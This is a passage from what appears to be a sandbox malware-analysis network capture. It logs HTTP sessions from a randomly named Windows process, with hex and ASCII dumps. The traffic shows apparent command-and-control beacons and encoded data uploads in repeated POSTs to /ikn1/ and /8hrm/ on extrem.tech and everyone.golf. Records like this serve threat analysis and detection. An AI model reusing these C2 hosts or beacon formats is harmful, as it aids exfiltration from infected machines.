                                                                                Data Ascii: QpyZCOC/F0u!+RNe ?3jvJJ:T%&qZLxg=:PggRB=D6"8`.$7{I8t(CeR<K"F_NzFD2'^i&Q29$hWBf,mDjFh2n<(u0RIbU=r
                                                                                Nov 17, 2024 08:38:26.049510002 CET20INData Raw: 61 0d 0a 03 00 3d 50 2f 84 04 16 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a=P/0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.450048172.217.18.19803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:27.633822918 CET498OUTGET /wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.oneid.ink
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:28.976594925 CET1236INHTTP/1.1 200 OK
                                                                                Date: Sun, 17 Nov 2024 07:38:28 GMT
                                                                                Expires: Sun, 17 Nov 2024 07:48:28 GMT
                                                                                Cache-Control: public, max-age=600
                                                                                ETag: "MuPk2Q"
                                                                                X-Cloud-Trace-Context: 1b78963158299ca5eca693e2726a2312
                                                                                Content-Type: text/html
                                                                                Server: Google Frontend
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Data Raw: 63 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 6f 6e 65 69 64 2e 70 6e 67 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 6e 64 20 6d 6f 6e 65 79 20 74 6f 20 53 72 69 20 4c 61 6e 6b 61 20 75 73 69 6e 67 20 43 72 65 64 69 74 2f 20 44 65 62 69 74 20 63 61 72 64 20 69 6e 73 74 61 6e 74 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 [TRUNCATED]
                                                                                Data Ascii: c93<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/oneid.png"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Send money to Sri Lanka using Credit/ Debit card instant"/><link rel="apple-touch-icon" href="/oneid.png"/><link rel="manifest" href="/manifest.json"/><title>OneRemit</title><meta name="title" content="OneRemit"/><meta property="og:title" content="OneRemit"/><meta name="twitter:title" content="OneRemit"/><meta name="description" content="Send money to Sri Lanka using Credit/ Debit card instant"/><script async src="https://www.googletagmanager.com/gtag/js?id=G-NF7P1YH6NR"></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-NF7P1YH6NR")</script><script defer="defer" src="/static/js/main.eeef10c9.js">
                                                                                Nov 17, 2024 08:38:28.976656914 CET1236INData Raw: 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 63 73 73 2f 6d 61 69 6e 2e 62 63 35 62 38 35 65 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e
                                                                                Data Ascii: </script><link href="/static/css/main.bc5b85e1.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><div class="wabtn" id="wabutton"><style>[wa-tooltip]{position:relative;cu
                                                                                Nov 17, 2024 08:38:28.976722956 CET1236INData Raw: 20 30 2e 30 33 32 30 34 36 33 43 31 31 2e 36 31 33 20 2d 30 2e 31 38 39 34 35 35 20 38 2e 32 38 37 37 34 20 30 2e 38 31 37 34 38 33 20 35 2e 36 31 35 36 35 20 32 2e 38 36 35 33 35 43 32 2e 39 34 33 35 37 20 34 2e 39 31 33 32 33 20 31 2e 31 30 36
                                                                                Data Ascii: 0.0320463C11.613 -0.189455 8.28774 0.817483 5.61565 2.86535C2.94357 4.91323 1.10682 7.86244 0.447451 11.1638C-0.21192 14.4652 0.351026 17.8937 2.03146 20.8109L0.0625 28.0004L7.42006 26.0712C9.45505 27.1794 11.7353 27.7601 14.0524 27.7602H14.0
                                                                                Nov 17, 2024 08:38:28.976756096 CET1236INData Raw: 33 20 37 2e 38 31 32 32 37 43 37 2e 38 39 39 20 38 2e 31 37 39 32 39 20 37 2e 35 39 32 30 39 20 38 2e 36 32 33 30 35 20 37 2e 33 38 35 34 37 20 39 2e 31 31 35 32 36 43 37 2e 31 37 38 38 34 20 39 2e 36 30 37 34 37 20 37 2e 30 37 37 30 34 20 31 30
                                                                                Data Ascii: 3 7.81227C7.899 8.17929 7.59209 8.62305 7.38547 9.11526C7.17884 9.60747 7.07704 10.1373 7.08655 10.6711C7.08655 12.3578 8.31519 13.9877 8.48655 14.2164C8.65791 14.4452 10.8581 18.0169 14.3425 19.3908C17.2382 20.5327 17.8276 20.3056 18.4562 20.
                                                                                Nov 17, 2024 08:38:28.976794004 CET848INData Raw: 32 35 2e 37 37 33 37 43 39 2e 35 30 37 32 37 20 32 36 2e 38 36 39 32 20 31 31 2e 37 36 31 33 20 32 37 2e 34 34 33 32 20 31 34 2e 30 35 31 39 20 32 37 2e 34 34 33 34 48 31 34 2e 30 35 37 37 43 31 36 2e 37 37 31 31 20 32 37 2e 34 34 33 36 20 31 39
                                                                                Data Ascii: 25.7737C9.50727 26.8692 11.7613 27.4432 14.0519 27.4434H14.0577C16.7711 27.4436 19.4235 26.6392 21.6798 25.1321C23.936 23.6249 25.6947 21.4825 26.7335 18.9759C27.7722 16.4693 28.0444 13.711 27.5157 11.0497C26.9869 8.38835 25.6809 5.94358 23.76
                                                                                Nov 17, 2024 08:38:28.976823092 CET160INData Raw: 64 74 68 3d 22 32 37 2e 38 37 34 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 30 36 32 35 29 22 3e 3c 2f 72 65 63 74 3e 3c 2f 63 6c 69 70
                                                                                Data Ascii: dth="27.8748" height="28" fill="white" transform="translate(0.0625)"></rect></clipPath></defs></svg> <span class="button-text"></span></a></div></body></html>
                                                                                Nov 17, 2024 08:38:28.978673935 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.45004913.248.169.48803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:34.218767881 CET757OUTPOST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 2b 36 45 56 58 30 2b 65 51 59 7a 6e 39 55 66 37 56 67 50 71 66 4b 70 6f 78 39 47 6d 63 64 70 59 32 35 47 70 32 69 75 38 62 69 79 38 68 68 4a 49 4e 44 33 70 75 4b 55 6e 63 70 2b 61 41 65 57 52 65 72 36 62 64 58 64 61 43 30 57 79 34 63 78 41 76 65 76 48 72 69 6e 65 37 4e 6d 4a 64 59 44 38 4a 5a 2b 65 31 4b 68 6b 62 45 4d 6e 6e 76 43 72 48 2f 4b 77 41 48 65 38 58 5a 71 58 58 68 35 67 63 78 56 4b 76 38 71 53 73 74 6c 34 31 57 6d 33 49 6b 70 64 35 65 66 36 47 2b 4e 77 56 37 31 67 68 53 70 77 59 37 33 6b 5a 44 68 59 4e 63 45 36 5a 6a 49 6d 6a 67 3d 3d
                                                                                Data Ascii: Y8i=oIUwMuHr5w96+6EVX0+eQYzn9Uf7VgPqfKpox9GmcdpY25Gp2iu8biy8hhJIND3puKUncp+aAeWRer6bdXdaC0Wy4cxAvevHrine7NmJdYD8JZ+e1KhkbEMnnvCrH/KwAHe8XZqXXh5gcxVKv8qSstl41Wm3Ikpd5ef6G+NwV71ghSpwY73kZDhYNcE6ZjImjg==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.45005013.248.169.48803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:36.805643082 CET777OUTPOST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 39 62 30 56 56 58 47 65 57 34 7a 6b 32 30 66 37 66 41 4f 6a 66 4b 6c 6f 78 34 6d 32 63 6f 78 59 32 62 4f 70 31 67 47 38 4c 79 79 38 72 42 4a 33 4a 44 32 45 75 4b 49 76 63 6f 75 61 41 65 71 52 65 76 2b 62 64 45 46 62 4e 45 57 38 30 38 78 43 72 65 76 48 72 69 6e 65 37 4e 7a 55 64 5a 72 38 4a 6f 4f 65 31 72 68 6c 57 6b 4d 67 69 76 43 72 4b 66 4b 30 41 48 65 4f 58 63 43 35 58 69 42 67 63 78 6c 4b 6f 75 4f 64 6d 74 6b 53 35 47 6d 70 4d 56 63 59 2f 37 2b 7a 47 63 67 51 65 35 42 51 6b 55 34 71 4a 4b 57 7a 4c 44 46 72 51 62 4e 4f 55 67 31 76 34 68 39 4e 67 36 44 30 61 6b 7a 4c 53 49 6c 75 5a 58 64 6b 45 30 45 3d
                                                                                Data Ascii: Y8i=oIUwMuHr5w969b0VVXGeW4zk20f7fAOjfKlox4m2coxY2bOp1gG8Lyy8rBJ3JD2EuKIvcouaAeqRev+bdEFbNEW808xCrevHrine7NzUdZr8JoOe1rhlWkMgivCrKfK0AHeOXcC5XiBgcxlKouOdmtkS5GmpMVcY/7+zGcgQe5BQkU4qJKWzLDFrQbNOUg1v4h9Ng6D0akzLSIluZXdkE0E=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.45005113.248.169.48803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:39.346117020 CET10859OUTPOST /ikn1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.extrem.tech
                                                                                Origin: http://www.extrem.tech
                                                                                Referer: http://www.extrem.tech/ikn1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 6f 49 55 77 4d 75 48 72 35 77 39 36 39 62 30 56 56 58 47 65 57 34 7a 6b 32 30 66 37 66 41 4f 6a 66 4b 6c 6f 78 34 6d 32 63 6f 35 59 32 75 61 70 31 47 4f 38 5a 69 79 38 77 42 4a 32 4a 44 33 47 75 4b 41 72 63 6f 6a 76 41 62 75 52 4d 38 6d 62 4b 42 78 62 61 30 57 38 70 73 78 44 76 65 76 57 72 6a 57 57 37 4e 6a 55 64 5a 72 38 4a 72 47 65 79 36 68 6c 46 55 4d 6e 6e 76 44 71 48 2f 4b 63 41 48 57 65 58 63 4f 48 58 54 68 67 63 52 31 4b 71 64 71 64 37 64 6b 51 36 47 6e 36 4d 56 41 54 2f 2f 57 56 47 59 68 48 65 36 64 51 70 69 39 70 51 4a 53 72 58 6a 68 4e 44 71 39 66 55 67 45 32 38 51 77 34 7a 76 50 37 4b 51 43 6a 4a 36 73 39 4c 6e 30 6b 51 53 37 43 57 5a 30 42 53 44 49 4f 7a 79 56 69 4a 67 4c 76 72 49 6d 56 46 73 67 71 51 58 6f 42 61 44 37 53 64 4a 32 31 45 58 55 46 59 33 69 4b 37 55 2b 72 6d 31 48 77 32 46 7a 42 61 52 31 4f 32 6f 69 64 53 49 4a 47 33 4a 32 47 6c 31 48 41 69 51 53 2f 72 74 39 34 39 33 62 6c 66 2b 36 6b 75 4d 52 74 39 68 6e 76 64 79 2f 58 41 69 39 61 75 46 47 53 41 45 44 67 69 4a [TRUNCATED]
                                                                                Data Ascii: Y8i=oIUwMuHr5w969b0VVXGeW4zk20f7fAOjfKlox4m2co5Y2uap1GO8Ziy8wBJ2JD3GuKArcojvAbuRM8mbKBxba0W8psxDvevWrjWW7NjUdZr8JrGey6hlFUMnnvDqH/KcAHWeXcOHXThgcR1Kqdqd7dkQ6Gn6MVAT//WVGYhHe6dQpi9pQJSrXjhNDq9fUgE28Qw4zvP7KQCjJ6s9Ln0kQS7CWZ0BSDIOzyViJgLvrImVFsgqQXoBaD7SdJ21EXUFY3iK7U+rm1Hw2FzBaR1O2oidSIJG3J2Gl1HAiQS/rt9493blf+6kuMRt9hnvdy/XAi9auFGSAEDgiJQCDBButHr/rlyM/V3TrS6uQWxZOtqo2RTr8A/NoR3ZbRLJYupxxruS32RseWDWFeyxfC0jZA32ND9auxrSymXUITMog7cpNoPs2LIVIQbxhGL6s4xTSE9Xa4qP8H5DWxYsU02e9z/G6QjeHoghtP6oWPxLDWWq8JErsmN/7l6K9qZA61x66c4XZFcMnggUhE0sFHjg9B1U5qUFuqxJlJJ6/XxCiIaUcKk8DBEc7eJy3rZd3fhL8Mi2TO58R81NrFGnNBky77YmeJsQ8OTX1XCg8dZzRL+jbaY/pdetJ+JnVdG6PMF1TLf8WDUvPKcSFeTT6RBnW6IWkRwUtWvPVhfbqMaK80MB4Rmd0PC9jvB3R7deHNaOK4d/4q6C7JfXPJ4BsXFwmTKD4pQjfzHGcBwLtNY+W9LuXytLKZA6P7DvNOw2y7SOgMcP8FeIGTiMW/hW9k8Ed3gVqeDZfhvfPQd/ebXV+YQk5V1nMwR4EDCQsvfsn6FPN44QZ/DfGSop2BZ1+IQWm8tD32O5HYgoHNTgU/oxQSDKqJ3kk8wQ6s82ghgocImlDL0ezmhjcPlC75kqOtY8fsz8nWfcSRbz37YCN3gG+ZN1o88VLkiXMHzjZCSwjyQXmwQIICzaDS67vOM/S4C/F66leFnhMe5mj3j8KxBwKIXCT1cj [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.45005213.248.169.48803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:42.011009932 CET500OUTGET /ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.extrem.tech
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:42.660067081 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 6c 4b 38 51 50 61 4c 6d 2f 7a 68 4b 71 4a 4d 59 4e 45 32 73 58 35 44 37 30 45 72 53 51 51 75 50 43 71 73 49 38 36 75 31 65 2f 78 43 73 2b 47 36 30 52 79 77 4c 58 43 4e 6e 45 5a 78 41 77 58 46 34 64 34 50 54 49 2f 36 59 49 53 42 4f 75 2b 53 43 68 30 37 4e 31 61 78 39 4a 59 41 37 71 7a 4e 78 6a 62 5a 33 37 6e 52 48 71 33 6a 49 6f 62 6e 39 5a 38 31 61 53 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.4500533.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:47.742291927 CET763OUTPOST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 4b 43 63 6d 2f 74 76 31 6c 7a 2f 72 54 64 6a 75 2b 70 59 77 62 72 4b 4b 69 6d 65 64 6a 52 31 55 66 52 79 37 39 58 4a 43 73 2b 45 69 61 32 2f 71 43 31 4f 47 52 69 43 37 6b 53 75 65 79 2f 5a 77 58 46 2b 63 6f 4c 75 4b 46 41 54 50 6b 47 76 48 2f 41 4f 6a 51 52 75 46 34 6d 30 55 76 63 64 5a 61 49 56 62 7a 4c 6a 39 53 49 41 73 6b 75 36 66 61 50 44 5a 45 53 52 47 4f 75 7a 75 77 48 75 33 49 56 32 5a 6d 39 54 79 58 78 55 53 62 53 79 5a 39 46 49 59 35 2f 6f 64 31 4a 72 65 77 4f 65 47 55 38 56 6b 72 39 33 57 2f 51 33 6a 38 6a 56 51 67 76 44 35 67 3d 3d
                                                                                Data Ascii: Y8i=y+atPIkB4rnDrKCcm/tv1lz/rTdju+pYwbrKKimedjR1UfRy79XJCs+Eia2/qC1OGRiC7kSuey/ZwXF+coLuKFATPkGvH/AOjQRuF4m0UvcdZaIVbzLj9SIAsku6faPDZESRGOuzuwHu3IV2Zm9TyXxUSbSyZ9FIY5/od1JrewOeGU8Vkr93W/Q3j8jVQgvD5g==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.4500543.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:50.290318012 CET783OUTPOST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 71 79 63 31 4a 6c 76 30 46 7a 38 6c 7a 64 6a 37 75 6f 52 77 62 6e 4b 4b 6d 2f 46 63 56 4a 31 56 36 31 79 70 49 33 4a 46 73 2b 45 37 71 32 41 6e 69 31 56 47 51 65 38 37 68 36 75 65 7a 66 5a 77 56 4e 2b 63 2f 33 74 4b 56 41 52 55 30 47 78 61 50 41 4f 6a 51 52 75 46 37 61 53 55 76 55 64 61 71 34 56 62 58 6e 67 6a 43 49 44 72 6b 75 36 62 61 50 35 5a 45 53 6a 47 4c 48 55 75 79 2f 75 33 4d 52 32 58 54 52 51 39 58 78 4f 50 72 54 48 64 63 30 59 53 4b 61 39 44 6e 35 70 51 41 65 4a 48 53 74 50 31 61 63 67 45 2f 30 45 2b 37 71 68 64 6a 53 4b 69 67 50 64 50 52 32 38 4c 76 39 34 43 63 42 4a 53 76 44 6b 44 64 6b 3d
                                                                                Data Ascii: Y8i=y+atPIkB4rnDrqyc1Jlv0Fz8lzdj7uoRwbnKKm/FcVJ1V61ypI3JFs+E7q2Ani1VGQe87h6uezfZwVN+c/3tKVARU0GxaPAOjQRuF7aSUvUdaq4VbXngjCIDrku6baP5ZESjGLHUuy/u3MR2XTRQ9XxOPrTHdc0YSKa9Dn5pQAeJHStP1acgE/0E+7qhdjSKigPdPR28Lv94CcBJSvDkDdk=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.4500553.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:52.837548018 CET10865OUTPOST /8hrm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.everyone.golf
                                                                                Origin: http://www.everyone.golf
                                                                                Referer: http://www.everyone.golf/8hrm/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 79 2b 61 74 50 49 6b 42 34 72 6e 44 72 71 79 63 31 4a 6c 76 30 46 7a 38 6c 7a 64 6a 37 75 6f 52 77 62 6e 4b 4b 6d 2f 46 63 56 78 31 55 4d 70 79 34 5a 33 4a 45 73 2b 45 6b 61 32 46 6e 69 30 58 47 52 32 34 37 68 32 68 65 32 62 5a 71 32 56 2b 4d 62 6a 74 45 56 41 52 64 55 47 77 48 2f 41 68 6a 51 41 6e 46 34 79 53 55 76 55 64 61 6f 51 56 63 44 4c 67 68 43 49 41 73 6b 75 32 66 61 4f 57 5a 45 4b 5a 47 4c 4b 6a 75 42 33 75 33 73 42 32 61 42 4a 51 77 58 78 51 4f 72 54 66 64 63 35 43 53 4b 47 4c 44 6e 68 48 51 43 43 4a 45 33 63 47 75 37 67 43 66 38 70 59 73 4a 6e 43 45 78 54 47 36 52 2f 46 4d 44 2b 39 5a 50 4e 58 41 4d 41 63 50 4f 65 67 52 4b 57 67 63 4c 63 4f 6d 79 55 47 30 38 68 6a 74 72 61 36 54 79 32 53 36 6e 4e 33 6f 75 6d 33 2b 6c 6b 6b 4e 74 69 79 7a 47 59 6f 57 59 50 38 47 47 68 2b 4e 52 33 70 75 6a 62 68 73 67 64 68 6a 33 79 63 33 4b 6d 38 6a 46 2b 2b 38 6d 32 68 4a 74 2b 47 4d 66 31 7a 74 41 68 4d 38 74 4c 48 6e 56 66 61 46 7a 38 33 73 57 44 67 45 46 30 63 64 50 57 5a 4b 77 4a 6e 46 73 [TRUNCATED]
